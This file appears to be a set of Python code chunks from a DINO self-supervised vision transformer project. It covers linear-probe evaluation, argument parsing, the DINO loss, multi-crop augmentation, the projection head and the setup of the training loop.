    linear_classifier.train()
    metric_logger = utils.MetricLogger(delimiter=" ")
    metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}'))
    header = 'Epoch: [{}]'.format(epoch)
    for (inp, target) in metric_logger.log_every(loader, 20, header):
        # move to gpu
        inp = inp.cuda(non_blocking=True)
        target = target.cuda(non_blocking=True)
        # forward
        with torch.no_grad():
            if "vit" in args.arch:
                intermediate_output = model.get_intermediate_layers(inp, n)
                output = torch.cat([x[:, 0] for x in intermediate_output], dim=-1)
                if avgpool:
                    output = torch.cat((output.unsqueeze(-1), torch.mean(intermediate_output[-1][:, 1:], dim=1).unsqueeze(-1)), dim=-1)
                    output = output.reshape(output.shape[0], -1)
            else:
                output = model(inp)
        output = linear_classifier(output)
        # compute cross entropy loss
        loss = nn.CrossEntropyLoss()(output, target)
        # compute the gradients
        optimizer.zero_grad()
        loss.backward()
        # step
        optimizer.step()
        # log
        torch.cuda.synchronize()
        metric_logger.update(loss=loss.item())
        metric_logger.update(lr=optimizer.param_groups[0]["lr"])
    # gather the stats from all processes
    metric_logger.synchronize_between_processes()
    print("Averaged stats:", metric_logger)
    return {k: meter.global_avg for k, meter in metric_logger.meters.items()}
def validate_network(val_loader, model, linear_classifier, n, avgpool):
    """Evaluate the linear classifier on `val_loader`; returns a dict of
    metric-name -> global average (acc1, optionally acc5, loss).

    NOTE(review): reads the module-level `args` (args.arch), and accesses
    `linear_classifier.module`, so the classifier is expected to be wrapped
    in DistributedDataParallel — confirm at call sites.
    """
    linear_classifier.eval()
    metric_logger = utils.MetricLogger(delimiter=" ")
    header = 'Test:'
    for inp, target in metric_logger.log_every(val_loader, 20, header):
        # move to gpu
        inp = inp.cuda(non_blocking=True)
        target = target.cuda(non_blocking=True)
        # forward
        with torch.no_grad():
            if "vit" in args.arch:
                intermediate_output = model.get_intermediate_layers(inp, n)
                output = torch.cat([x[:, 0] for x in intermediate_output], dim=-1)
                if avgpool:
                    output = torch.cat((output.unsqueeze(-1), torch.mean(intermediate_output[-1][:, 1:], dim=1).unsqueeze(-1)), dim=-1)
                    output = output.reshape(output.shape[0], -1)
            else:
                output = model(inp)
        output = linear_classifier(output)
        loss = nn.CrossEntropyLoss()(output, target)
        # top-5 accuracy only makes sense with at least 5 classes
        if linear_classifier.module.num_labels >= 5:
            acc1, acc5 = utils.accuracy(output, target, topk=(1, 5))
        else:
            acc1, = utils.accuracy(output, target, topk=(1,))
        batch_size = inp.shape[0]
        metric_logger.update(loss=loss.item())
        metric_logger.meters['acc1'].update(acc1.item(), n=batch_size)
        if linear_classifier.module.num_labels >= 5:
            metric_logger.meters['acc5'].update(acc5.item(), n=batch_size)
    if linear_classifier.module.num_labels >= 5:
        print('* Acc@1 {top1.global_avg:.3f} Acc@5 {top5.global_avg:.3f} loss {losses.global_avg:.3f}'
            .format(top1=metric_logger.acc1, top5=metric_logger.acc5, losses=metric_logger.loss))
    else:
        print('* Acc@1 {top1.global_avg:.3f} loss {losses.global_avg:.3f}'
            .format(top1=metric_logger.acc1, losses=metric_logger.loss))
    return {k: meter.global_avg for k, meter in metric_logger.meters.items()}
class LinearClassifier(nn.Module):
    """Linear layer to train on top of frozen features."""

    def __init__(self, dim, num_labels=1000):
        super(LinearClassifier, self).__init__()
        # kept as an attribute so evaluation code can pick top-1 vs top-5
        self.num_labels = num_labels
        self.linear = nn.Linear(dim, num_labels)
        # DINO probe init: small gaussian weights, zero bias
        self.linear.weight.data.normal_(mean=0.0, std=0.01)
        self.linear.bias.data.zero_()

    def forward(self, x):
        """Flatten all but the batch dimension, then apply the linear layer."""
        flat = x.view(x.size(0), -1)
        return self.linear(flat)
def eval_linear(args):
    """Linear-probe evaluation: build the frozen backbone, load its pretrained
    weights, then either evaluate reference linear weights (--evaluate) or
    train a LinearClassifier on frozen features, checkpointing and logging
    the best top-1 validation accuracy."""
    utils.init_distributed_mode(args)
    print("git:\n {}\n".format(utils.get_sha()))
    print("\n".join("%s: %s" % (k, str(v)) for k, v in sorted(dict(vars(args)).items())))
    cudnn.benchmark = True
    # ============ building network ... ============
    # if the network is a Vision Transformer (i.e. vit_tiny, vit_small, vit_base)
    if args.arch in vits.__dict__.keys():
        model = vits.__dict__[args.arch](patch_size=args.patch_size, num_classes=0)
        # probe input = concatenated [CLS] tokens (+ optional avgpooled patches)
        embed_dim = model.embed_dim * (args.n_last_blocks + int(args.avgpool_patchtokens))
    # if the network is a XCiT
    elif "xcit" in args.arch:
        model = torch.hub.load('facebookresearch/xcit:main', args.arch, num_classes=0)
        embed_dim = model.embed_dim
    # otherwise, we check if the architecture is in torchvision models
    elif args.arch in torchvision_models.__dict__.keys():
        model = torchvision_models.__dict__[args.arch]()
        embed_dim = model.fc.weight.shape[1]
        # strip the classification head; the backbone outputs raw features
        model.fc = nn.Identity()
    else:
        print(f"Unknow architecture: {args.arch}")
        sys.exit(1)
    model.cuda()
    model.eval()
    # load weights to evaluate
    utils.load_pretrained_weights(model, args.pretrained_weights, args.checkpoint_key, args.arch, args.patch_size)
    print(f"Model {args.arch} built.")
    linear_classifier = LinearClassifier(embed_dim, num_labels=args.num_labels)
    linear_classifier = linear_classifier.cuda()
    linear_classifier = nn.parallel.DistributedDataParallel(linear_classifier, device_ids=[args.gpu])
    # ============ preparing data ... ============
    val_transform = pth_transforms.Compose([
        pth_transforms.Resize(256, interpolation=3),
        pth_transforms.CenterCrop(224),
        pth_transforms.ToTensor(),
        pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
    ])
    dataset_val = datasets.ImageFolder(os.path.join(args.data_path, "val"), transform=val_transform)
    val_loader = torch.utils.data.DataLoader(
        dataset_val,
        batch_size=args.batch_size_per_gpu,
        num_workers=args.num_workers,
        pin_memory=True,
    )
    # evaluation-only path: load reference linear weights and exit
    if args.evaluate:
        utils.load_pretrained_linear_weights(linear_classifier, args.arch, args.patch_size)
        test_stats = validate_network(val_loader, model, linear_classifier, args.n_last_blocks, args.avgpool_patchtokens)
        print(f"Accuracy of the network on the {len(dataset_val)} test images: {test_stats['acc1']:.1f}%")
        return
    train_transform = pth_transforms.Compose([
        pth_transforms.RandomResizedCrop(224),
        pth_transforms.RandomHorizontalFlip(),
        pth_transforms.ToTensor(),
        pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
    ])
    dataset_train = datasets.ImageFolder(os.path.join(args.data_path, "train"), transform=train_transform)
    sampler = torch.utils.data.distributed.DistributedSampler(dataset_train)
    train_loader = torch.utils.data.DataLoader(
        dataset_train,
        sampler=sampler,
        batch_size=args.batch_size_per_gpu,
        num_workers=args.num_workers,
        pin_memory=True,
    )
    print(f"Data loaded with {len(dataset_train)} train and {len(dataset_val)} val imgs.")
    # set optimizer
    optimizer = torch.optim.SGD(
        linear_classifier.parameters(),
        args.lr * (args.batch_size_per_gpu * utils.get_world_size()) / 256., # linear scaling rule
        momentum=0.9,
        weight_decay=0, # we do not apply weight decay
    )
    scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, args.epochs, eta_min=0)
    # Optionally resume from a checkpoint
    to_restore = {"epoch": 0, "best_acc": 0.}
    utils.restart_from_checkpoint(
        os.path.join(args.output_dir, "checkpoint.pth.tar"),
        run_variables=to_restore,
        state_dict=linear_classifier,
        optimizer=optimizer,
        scheduler=scheduler,
    )
    start_epoch = to_restore["epoch"]
    best_acc = to_restore["best_acc"]
    for epoch in range(start_epoch, args.epochs):
        # reshuffle the distributed sampler deterministically per epoch
        train_loader.sampler.set_epoch(epoch)
        train_stats = train(model, linear_classifier, optimizer, train_loader, epoch, args.n_last_blocks, args.avgpool_patchtokens)
        scheduler.step()
        log_stats = {**{f'train_{k}': v for k, v in train_stats.items()},
                     'epoch': epoch}
        if epoch % args.val_freq == 0 or epoch == args.epochs - 1:
            test_stats = validate_network(val_loader, model, linear_classifier, args.n_last_blocks, args.avgpool_patchtokens)
            print(f"Accuracy at epoch {epoch} of the network on the {len(dataset_val)} test images: {test_stats['acc1']:.1f}%")
            best_acc = max(best_acc, test_stats["acc1"])
            print(f'Max accuracy so far: {best_acc:.2f}%')
            log_stats = {**{k: v for k, v in log_stats.items()},
                         **{f'test_{k}': v for k, v in test_stats.items()}}
        # only rank 0 writes logs and checkpoints
        if utils.is_main_process():
            with (Path(args.output_dir) / "log.txt").open("a") as f:
                f.write(json.dumps(log_stats) + "\n")
            save_dict = {
                "epoch": epoch + 1,
                "state_dict": linear_classifier.state_dict(),
                "optimizer": optimizer.state_dict(),
                "scheduler": scheduler.state_dict(),
                "best_acc": best_acc,
            }
            torch.save(save_dict, os.path.join(args.output_dir, "checkpoint.pth.tar"))
    print("Training of the supervised linear classifier on frozen features completed.\n"
        "Top-1 test accuracy: {acc:.1f}".format(acc=best_acc))
161,733 | import os
import sys
import pickle
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import models as torchvision_models
from torchvision import transforms as pth_transforms
from PIL import Image, ImageFile
import numpy as np
import utils
import vision_transformer as vits
from eval_knn import extract_features
def config_imname(cfg, i):
    """Full path of the i-th database image described by dataset config `cfg`
    (directory + image-list entry + extension)."""
    filename = cfg['imlist'][i] + cfg['ext']
    return os.path.join(cfg['dir_images'], filename)
161,734 | import os
import sys
import pickle
import argparse
import torch
from torch import nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from torchvision import models as torchvision_models
from torchvision import transforms as pth_transforms
from PIL import Image, ImageFile
import numpy as np
import utils
import vision_transformer as vits
from eval_knn import extract_features
def config_qimname(cfg, i):
    """Return the full path of query image `i` described by config `cfg`."""
    filename = cfg['qimlist'][i] + cfg['qext']
    return os.path.join(cfg['dir_images'], filename)
161,735 | import argparse
import os
import sys
import datetime
import time
import math
import json
from pathlib import Path
import numpy as np
from PIL import Image
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
from torchvision import datasets, transforms
from torchvision import models as torchvision_models
import utils
import vision_transformer as vits
from vision_transformer import DINOHead
# Every lower-case, non-dunder, callable entry of torchvision.models is a
# valid architecture constructor (e.g. "resnet50"); sort for stable --help output.
torchvision_archs = sorted(
    name for name, candidate in torchvision_models.__dict__.items()
    if name.islower() and not name.startswith("__") and callable(candidate)
)
def get_args_parser():
    """Build the argparse parser holding every DINO pre-training option.

    Returns:
        argparse.ArgumentParser: created with ``add_help=False`` so it can be
        composed as a parent parser by a wrapping script.
    """
    parser = argparse.ArgumentParser('DINO', add_help=False)

    # Model parameters
    # NOTE(review): torch.hub.list() performs a network request at parser
    # construction time — confirm this is acceptable for offline runs.
    parser.add_argument('--arch', default='vit_small', type=str,
        choices=['vit_tiny', 'vit_small', 'vit_base', 'xcit', 'deit_tiny', 'deit_small'] \
                + torchvision_archs + torch.hub.list("facebookresearch/xcit:main"),
        help="""Name of architecture to train. For quick experiments with ViTs,
        we recommend using vit_tiny or vit_small.""")
    parser.add_argument('--patch_size', default=16, type=int, help="""Size in pixels
        of input square patches - default 16 (for 16x16 patches). Using smaller
        values leads to better performance but requires more memory. Applies only
        for ViTs (vit_tiny, vit_small and vit_base). If <16, we recommend disabling
        mixed precision training (--use_fp16 false) to avoid unstabilities.""")
    parser.add_argument('--out_dim', default=65536, type=int, help="""Dimensionality of
        the DINO head output. For complex and large datasets large values (like 65k) work well.""")
    parser.add_argument('--norm_last_layer', default=True, type=utils.bool_flag,
        help="""Whether or not to weight normalize the last layer of the DINO head.
        Not normalizing leads to better performance but can make the training unstable.
        In our experiments, we typically set this paramater to False with vit_small and True with vit_base.""")
    parser.add_argument('--momentum_teacher', default=0.996, type=float, help="""Base EMA
        parameter for teacher update. The value is increased to 1 during training with cosine schedule.
        We recommend setting a higher value with small batches: for example use 0.9995 with batch size of 256.""")
    parser.add_argument('--use_bn_in_head', default=False, type=utils.bool_flag,
        help="Whether to use batch normalizations in projection head (Default: False)")

    # Temperature teacher parameters
    parser.add_argument('--warmup_teacher_temp', default=0.04, type=float,
        help="""Initial value for the teacher temperature: 0.04 works well in most cases.
        Try decreasing it if the training loss does not decrease.""")
    parser.add_argument('--teacher_temp', default=0.04, type=float, help="""Final value (after linear warmup)
        of the teacher temperature. For most experiments, anything above 0.07 is unstable. We recommend
        starting with the default value of 0.04 and increase this slightly if needed.""")
    parser.add_argument('--warmup_teacher_temp_epochs', default=0, type=int,
        help='Number of warmup epochs for the teacher temperature (Default: 30).')

    # Training/Optimization parameters
    parser.add_argument('--use_fp16', type=utils.bool_flag, default=True, help="""Whether or not
        to use half precision for training. Improves training time and memory requirements,
        but can provoke instability and slight decay of performance. We recommend disabling
        mixed precision if the loss is unstable, if reducing the patch size or if training with bigger ViTs.""")
    parser.add_argument('--weight_decay', type=float, default=0.04, help="""Initial value of the
        weight decay. With ViT, a smaller value at the beginning of training works well.""")
    parser.add_argument('--weight_decay_end', type=float, default=0.4, help="""Final value of the
        weight decay. We use a cosine schedule for WD and using a larger decay by
        the end of training improves performance for ViTs.""")
    parser.add_argument('--clip_grad', type=float, default=3.0, help="""Maximal parameter
        gradient norm if using gradient clipping. Clipping with norm .3 ~ 1.0 can
        help optimization for larger ViT architectures. 0 for disabling.""")
    parser.add_argument('--batch_size_per_gpu', default=64, type=int,
        help='Per-GPU batch-size : number of distinct images loaded on one GPU.')
    parser.add_argument('--epochs', default=100, type=int, help='Number of epochs of training.')
    parser.add_argument('--freeze_last_layer', default=1, type=int, help="""Number of epochs
        during which we keep the output layer fixed. Typically doing so during
        the first epoch helps training. Try increasing this value if the loss does not decrease.""")
    parser.add_argument("--lr", default=0.0005, type=float, help="""Learning rate at the end of
        linear warmup (highest LR used during training). The learning rate is linearly scaled
        with the batch size, and specified here for a reference batch size of 256.""")
    parser.add_argument("--warmup_epochs", default=10, type=int,
        help="Number of epochs for the linear learning-rate warm up.")
    parser.add_argument('--min_lr', type=float, default=1e-6, help="""Target LR at the
        end of optimization. We use a cosine LR schedule with linear warmup.""")
    parser.add_argument('--optimizer', default='adamw', type=str,
        choices=['adamw', 'sgd', 'lars'], help="""Type of optimizer. We recommend using adamw with ViTs.""")
    parser.add_argument('--drop_path_rate', type=float, default=0.1, help="stochastic depth rate")

    # Multi-crop parameters
    parser.add_argument('--global_crops_scale', type=float, nargs='+', default=(0.4, 1.),
        help="""Scale range of the cropped image before resizing, relatively to the origin image.
        Used for large global view cropping. When disabling multi-crop (--local_crops_number 0), we
        recommand using a wider range of scale ("--global_crops_scale 0.14 1." for example)""")
    parser.add_argument('--local_crops_number', type=int, default=8, help="""Number of small
        local views to generate. Set this parameter to 0 to disable multi-crop training.
        When disabling multi-crop we recommend to use "--global_crops_scale 0.14 1." """)
    parser.add_argument('--local_crops_scale', type=float, nargs='+', default=(0.05, 0.4),
        help="""Scale range of the cropped image before resizing, relatively to the origin image.
        Used for small local view cropping of multi-crop.""")

    # Misc
    parser.add_argument('--data_path', default='/path/to/imagenet/train/', type=str,
        help='Please specify path to the ImageNet training data.')
    parser.add_argument('--output_dir', default=".", type=str, help='Path to save logs and checkpoints.')
    parser.add_argument('--saveckp_freq', default=20, type=int, help='Save checkpoint every x epochs.')
    parser.add_argument('--seed', default=0, type=int, help='Random seed.')
    parser.add_argument('--num_workers', default=10, type=int, help='Number of data loading workers per GPU.')
    parser.add_argument("--dist_url", default="env://", type=str, help="""url used to set up
        distributed training; see https://pytorch.org/docs/stable/distributed.html""")
    parser.add_argument("--local_rank", default=0, type=int, help="Please ignore and do not set this argument.")
    return parser
161,736 | import argparse
import os
import sys
import datetime
import time
import math
import json
from pathlib import Path
import numpy as np
from PIL import Image
import torch
import torch.nn as nn
import torch.distributed as dist
import torch.backends.cudnn as cudnn
import torch.nn.functional as F
from torchvision import datasets, transforms
from torchvision import models as torchvision_models
import utils
import vision_transformer as vits
from vision_transformer import DINOHead
def train_one_epoch(student, teacher, teacher_without_ddp, dino_loss, data_loader,
                    optimizer, lr_schedule, wd_schedule, momentum_schedule,epoch,
                    fp16_scaler, args):
    """Run one epoch of DINO training.

    Args:
        student: DDP-wrapped student network (backbone + DINO head).
        teacher: teacher network (DDP-wrapped only when SyncBN is used).
        teacher_without_ddp: teacher module without the DDP wrapper, used as
            the target of the EMA parameter update.
        dino_loss: DINOLoss instance.
        data_loader: yields (list_of_crop_tensors, label) batches.
        optimizer: optimizer over the student parameters.
        lr_schedule, wd_schedule, momentum_schedule: per-iteration schedules,
            indexed by the global iteration number.
        epoch: current epoch (for logging and the teacher-temp schedule).
        fp16_scaler: torch.cuda.amp.GradScaler, or None for full precision.
        args: parsed command-line arguments (clip_grad, freeze_last_layer, ...).

    Returns:
        dict mapping each logged metric name to its epoch-averaged value.
    """
    metric_logger = utils.MetricLogger(delimiter=" ")
    header = 'Epoch: [{}/{}]'.format(epoch, args.epochs)
    for it, (images, _) in enumerate(metric_logger.log_every(data_loader, 10, header)):
        # update weight decay and learning rate according to their schedule
        it = len(data_loader) * epoch + it  # global training iteration
        for i, param_group in enumerate(optimizer.param_groups):
            param_group["lr"] = lr_schedule[it]
            if i == 0:  # only the first group is regularized
                param_group["weight_decay"] = wd_schedule[it]

        # move images to gpu
        images = [im.cuda(non_blocking=True) for im in images]
        # teacher and student forward passes + compute dino loss
        with torch.cuda.amp.autocast(fp16_scaler is not None):
            teacher_output = teacher(images[:2])  # only the 2 global views pass through the teacher
            student_output = student(images)
            loss = dino_loss(student_output, teacher_output, epoch)

        # abort immediately on NaN/inf loss rather than corrupting the weights
        if not math.isfinite(loss.item()):
            print("Loss is {}, stopping training".format(loss.item()), force=True)
            sys.exit(1)

        # student update
        optimizer.zero_grad()
        param_norms = None
        if fp16_scaler is None:
            loss.backward()
            if args.clip_grad:
                param_norms = utils.clip_gradients(student, args.clip_grad)
            utils.cancel_gradients_last_layer(epoch, student,
                                              args.freeze_last_layer)
            optimizer.step()
        else:
            fp16_scaler.scale(loss).backward()
            if args.clip_grad:
                fp16_scaler.unscale_(optimizer)  # unscale the gradients of optimizer's assigned params in-place
                param_norms = utils.clip_gradients(student, args.clip_grad)
            utils.cancel_gradients_last_layer(epoch, student,
                                              args.freeze_last_layer)
            fp16_scaler.step(optimizer)
            fp16_scaler.update()

        # EMA update for the teacher (no gradients ever flow to the teacher)
        with torch.no_grad():
            m = momentum_schedule[it]  # momentum parameter
            for param_q, param_k in zip(student.module.parameters(), teacher_without_ddp.parameters()):
                param_k.data.mul_(m).add_((1 - m) * param_q.detach().data)

        # logging
        torch.cuda.synchronize()
        metric_logger.update(loss=loss.item())
        metric_logger.update(lr=optimizer.param_groups[0]["lr"])
        metric_logger.update(wd=optimizer.param_groups[0]["weight_decay"])
    # gather the stats from all processes
    metric_logger.synchronize_between_processes()
    print("Averaged stats:", metric_logger)
    return {k: meter.global_avg for k, meter in metric_logger.meters.items()}
class DINOLoss(nn.Module):
    """Cross-entropy loss between teacher and student multi-crop outputs.

    The teacher output is sharpened with a (scheduled) low temperature and
    centered by a running mean (``self.center``) to avoid collapse; the
    student output is tempered with ``student_temp``.

    Args:
        out_dim: dimensionality of the DINO head output.
        ncrops: total number of crops fed to the student (2 global + locals).
        warmup_teacher_temp, teacher_temp, warmup_teacher_temp_epochs:
            linear warm-up schedule for the teacher temperature.
        nepochs: total number of training epochs (schedule length).
        student_temp: fixed student softmax temperature.
        center_momentum: EMA momentum for the center update.
    """
    def __init__(self, out_dim, ncrops, warmup_teacher_temp, teacher_temp,
                 warmup_teacher_temp_epochs, nepochs, student_temp=0.1,
                 center_momentum=0.9):
        super().__init__()
        self.student_temp = student_temp
        self.center_momentum = center_momentum
        self.ncrops = ncrops
        # buffer so the center moves with the module between devices and is checkpointed
        self.register_buffer("center", torch.zeros(1, out_dim))
        # we apply a warm up for the teacher temperature because
        # a too high temperature makes the training instable at the beginning
        self.teacher_temp_schedule = np.concatenate((
            np.linspace(warmup_teacher_temp,
                        teacher_temp, warmup_teacher_temp_epochs),
            np.ones(nepochs - warmup_teacher_temp_epochs) * teacher_temp
        ))

    def forward(self, student_output, teacher_output, epoch):
        """
        Cross-entropy between softmax outputs of the teacher and student networks.

        ``student_output`` holds all ncrops views stacked along the batch dim;
        ``teacher_output`` holds only the 2 global views. Returns a scalar loss
        averaged over all (teacher view, student view) pairs with distinct views.
        """
        student_out = student_output / self.student_temp
        student_out = student_out.chunk(self.ncrops)

        # teacher centering and sharpening
        temp = self.teacher_temp_schedule[epoch]
        teacher_out = F.softmax((teacher_output - self.center) / temp, dim=-1)
        teacher_out = teacher_out.detach().chunk(2)

        total_loss = 0
        n_loss_terms = 0
        for iq, q in enumerate(teacher_out):
            for v in range(len(student_out)):
                if v == iq:
                    # we skip cases where student and teacher operate on the same view
                    continue
                loss = torch.sum(-q * F.log_softmax(student_out[v], dim=-1), dim=-1)
                total_loss += loss.mean()
                n_loss_terms += 1
        total_loss /= n_loss_terms
        self.update_center(teacher_output)
        return total_loss

    def update_center(self, teacher_output):
        """
        Update center used for teacher output.

        The batch mean is averaged across all distributed processes
        (all_reduce sums; dividing by batch * world_size yields the mean),
        then folded into the running center with EMA momentum.
        """
        batch_center = torch.sum(teacher_output, dim=0, keepdim=True)
        dist.all_reduce(batch_center)
        batch_center = batch_center / (len(teacher_output) * dist.get_world_size())

        # ema update
        self.center = self.center * self.center_momentum + batch_center * (1 - self.center_momentum)
class DataAugmentationDINO(object):
    """Multi-crop augmentation pipeline used by DINO.

    Each call produces 2 global 224x224 views plus ``local_crops_number``
    local 96x96 views of the same input image.
    """

    def __init__(self, global_crops_scale, local_crops_scale, local_crops_number):
        # shared photometric augmentation: flip, color jitter, grayscale
        color_distortion = transforms.Compose([
            transforms.RandomHorizontalFlip(p=0.5),
            transforms.RandomApply(
                [transforms.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.2, hue=0.1)],
                p=0.8
            ),
            transforms.RandomGrayscale(p=0.2),
        ])
        # shared conversion to normalized tensor (ImageNet statistics)
        to_normalized_tensor = transforms.Compose([
            transforms.ToTensor(),
            transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),
        ])
        # first global crop: blur is always applied
        self.global_transfo1 = transforms.Compose([
            transforms.RandomResizedCrop(224, scale=global_crops_scale, interpolation=Image.BICUBIC),
            color_distortion,
            utils.GaussianBlur(1.0),
            to_normalized_tensor,
        ])
        # second global crop: rare blur plus occasional solarization
        self.global_transfo2 = transforms.Compose([
            transforms.RandomResizedCrop(224, scale=global_crops_scale, interpolation=Image.BICUBIC),
            color_distortion,
            utils.GaussianBlur(0.1),
            utils.Solarization(0.2),
            to_normalized_tensor,
        ])
        # small local crops: blur applied half the time
        self.local_crops_number = local_crops_number
        self.local_transfo = transforms.Compose([
            transforms.RandomResizedCrop(96, scale=local_crops_scale, interpolation=Image.BICUBIC),
            color_distortion,
            utils.GaussianBlur(p=0.5),
            to_normalized_tensor,
        ])

    def __call__(self, image):
        """Return the list of augmented views: 2 global crops then the local ones."""
        views = [self.global_transfo1(image), self.global_transfo2(image)]
        views.extend(self.local_transfo(image) for _ in range(self.local_crops_number))
        return views
class DINOHead(nn.Module):
    """Projection head appended to the DINO backbone.

    An MLP (``nlayers`` linear layers with GELU activations and optional
    BatchNorm) maps backbone embeddings to a ``bottleneck_dim`` space; the
    L2-normalized bottleneck is then projected onto ``out_dim`` prototypes by
    a weight-normalized bias-free linear layer.

    Args:
        in_dim: dimensionality of the backbone output.
        out_dim: number of output prototypes (DINO loss dimensionality).
        use_bn: insert BatchNorm1d after each hidden linear layer.
        norm_last_layer: freeze the weight-norm magnitude (``weight_g``) of
            the last layer at 1, which stabilizes training.
        nlayers: number of linear layers in the MLP (clamped to >= 1).
        hidden_dim: width of the hidden layers.
        bottleneck_dim: dimensionality of the normalized bottleneck.
    """
    def __init__(self, in_dim, out_dim, use_bn=False, norm_last_layer=True, nlayers=3, hidden_dim=2048, bottleneck_dim=256):
        super().__init__()
        nlayers = max(nlayers, 1)
        if nlayers == 1:
            self.mlp = nn.Linear(in_dim, bottleneck_dim)
        else:
            layers = [nn.Linear(in_dim, hidden_dim)]
            if use_bn:
                layers.append(nn.BatchNorm1d(hidden_dim))
            layers.append(nn.GELU())
            for _ in range(nlayers - 2):
                layers.append(nn.Linear(hidden_dim, hidden_dim))
                if use_bn:
                    layers.append(nn.BatchNorm1d(hidden_dim))
                layers.append(nn.GELU())
            layers.append(nn.Linear(hidden_dim, bottleneck_dim))
            self.mlp = nn.Sequential(*layers)
        self.apply(self._init_weights)
        self.last_layer = nn.utils.weight_norm(nn.Linear(bottleneck_dim, out_dim, bias=False))
        self.last_layer.weight_g.data.fill_(1)
        if norm_last_layer:
            self.last_layer.weight_g.requires_grad = False

    def _init_weights(self, m):
        # Fix: the original called the free function `trunc_normal_`, which is
        # neither defined nor imported in this module (NameError at
        # construction time); use the equivalent torch built-in instead.
        if isinstance(m, nn.Linear):
            nn.init.trunc_normal_(m.weight, std=.02)
            if m.bias is not None:
                nn.init.constant_(m.bias, 0)

    def forward(self, x):
        x = self.mlp(x)
        x = nn.functional.normalize(x, dim=-1, p=2)  # L2-normalize the bottleneck
        x = self.last_layer(x)
        return x
def train_dino(args):
    """Main DINO pre-training entry point (runs once per GPU process).

    Builds the multi-crop data pipeline, the student/teacher networks, the
    DINO loss, optimizer and per-iteration schedules, optionally resumes from
    ``checkpoint.pth`` in ``args.output_dir``, then runs the epoch loop with
    checkpointing and JSON logging from the main process.
    """
    utils.init_distributed_mode(args)
    utils.fix_random_seeds(args.seed)
    print("git:\n {}\n".format(utils.get_sha()))
    print("\n".join("%s: %s" % (k, str(v)) for k, v in sorted(dict(vars(args)).items())))
    cudnn.benchmark = True

    # ============ preparing data ... ============
    transform = DataAugmentationDINO(
        args.global_crops_scale,
        args.local_crops_scale,
        args.local_crops_number,
    )
    dataset = datasets.ImageFolder(args.data_path, transform=transform)
    sampler = torch.utils.data.DistributedSampler(dataset, shuffle=True)
    data_loader = torch.utils.data.DataLoader(
        dataset,
        sampler=sampler,
        batch_size=args.batch_size_per_gpu,
        num_workers=args.num_workers,
        pin_memory=True,
        drop_last=True,
    )
    print(f"Data loaded: there are {len(dataset)} images.")

    # ============ building student and teacher networks ... ============
    # we changed the name DeiT-S for ViT-S to avoid confusions
    args.arch = args.arch.replace("deit", "vit")
    # if the network is a Vision Transformer (i.e. vit_tiny, vit_small, vit_base)
    if args.arch in vits.__dict__.keys():
        student = vits.__dict__[args.arch](
            patch_size=args.patch_size,
            drop_path_rate=args.drop_path_rate,  # stochastic depth
        )
        teacher = vits.__dict__[args.arch](patch_size=args.patch_size)
        embed_dim = student.embed_dim
    # if the network is a XCiT
    elif args.arch in torch.hub.list("facebookresearch/xcit:main"):
        student = torch.hub.load('facebookresearch/xcit:main', args.arch,
                                 pretrained=False, drop_path_rate=args.drop_path_rate)
        teacher = torch.hub.load('facebookresearch/xcit:main', args.arch, pretrained=False)
        embed_dim = student.embed_dim
    # otherwise, we check if the architecture is in torchvision models
    elif args.arch in torchvision_models.__dict__.keys():
        student = torchvision_models.__dict__[args.arch]()
        teacher = torchvision_models.__dict__[args.arch]()
        embed_dim = student.fc.weight.shape[1]
    else:
        # NOTE(review): execution falls through with `student` undefined here,
        # so an unknown arch crashes with a NameError on the next statement.
        print(f"Unknow architecture: {args.arch}")

    # multi-crop wrapper handles forward with inputs of different resolutions
    student = utils.MultiCropWrapper(student, DINOHead(
        embed_dim,
        args.out_dim,
        use_bn=args.use_bn_in_head,
        norm_last_layer=args.norm_last_layer,
    ))
    teacher = utils.MultiCropWrapper(
        teacher,
        DINOHead(embed_dim, args.out_dim, args.use_bn_in_head),
    )
    # move networks to gpu
    student, teacher = student.cuda(), teacher.cuda()
    # synchronize batch norms (if any)
    if utils.has_batchnorms(student):
        student = nn.SyncBatchNorm.convert_sync_batchnorm(student)
        teacher = nn.SyncBatchNorm.convert_sync_batchnorm(teacher)
        # we need DDP wrapper to have synchro batch norms working...
        teacher = nn.parallel.DistributedDataParallel(teacher, device_ids=[args.gpu])
        teacher_without_ddp = teacher.module
    else:
        # teacher_without_ddp and teacher are the same thing
        teacher_without_ddp = teacher
    student = nn.parallel.DistributedDataParallel(student, device_ids=[args.gpu])
    # teacher and student start with the same weights
    teacher_without_ddp.load_state_dict(student.module.state_dict())
    # there is no backpropagation through the teacher, so no need for gradients
    for p in teacher.parameters():
        p.requires_grad = False
    print(f"Student and Teacher are built: they are both {args.arch} network.")

    # ============ preparing loss ... ============
    dino_loss = DINOLoss(
        args.out_dim,
        args.local_crops_number + 2,  # total number of crops = 2 global crops + local_crops_number
        args.warmup_teacher_temp,
        args.teacher_temp,
        args.warmup_teacher_temp_epochs,
        args.epochs,
    ).cuda()

    # ============ preparing optimizer ... ============
    params_groups = utils.get_params_groups(student)
    if args.optimizer == "adamw":
        optimizer = torch.optim.AdamW(params_groups)  # to use with ViTs
    elif args.optimizer == "sgd":
        optimizer = torch.optim.SGD(params_groups, lr=0, momentum=0.9)  # lr is set by scheduler
    elif args.optimizer == "lars":
        optimizer = utils.LARS(params_groups)  # to use with convnet and large batches
    # for mixed precision training
    fp16_scaler = None
    if args.use_fp16:
        fp16_scaler = torch.cuda.amp.GradScaler()

    # ============ init schedulers ... ============
    lr_schedule = utils.cosine_scheduler(
        args.lr * (args.batch_size_per_gpu * utils.get_world_size()) / 256.,  # linear scaling rule
        args.min_lr,
        args.epochs, len(data_loader),
        warmup_epochs=args.warmup_epochs,
    )
    wd_schedule = utils.cosine_scheduler(
        args.weight_decay,
        args.weight_decay_end,
        args.epochs, len(data_loader),
    )
    # momentum parameter is increased to 1. during training with a cosine schedule
    momentum_schedule = utils.cosine_scheduler(args.momentum_teacher, 1,
                                               args.epochs, len(data_loader))
    print(f"Loss, optimizer and schedulers ready.")

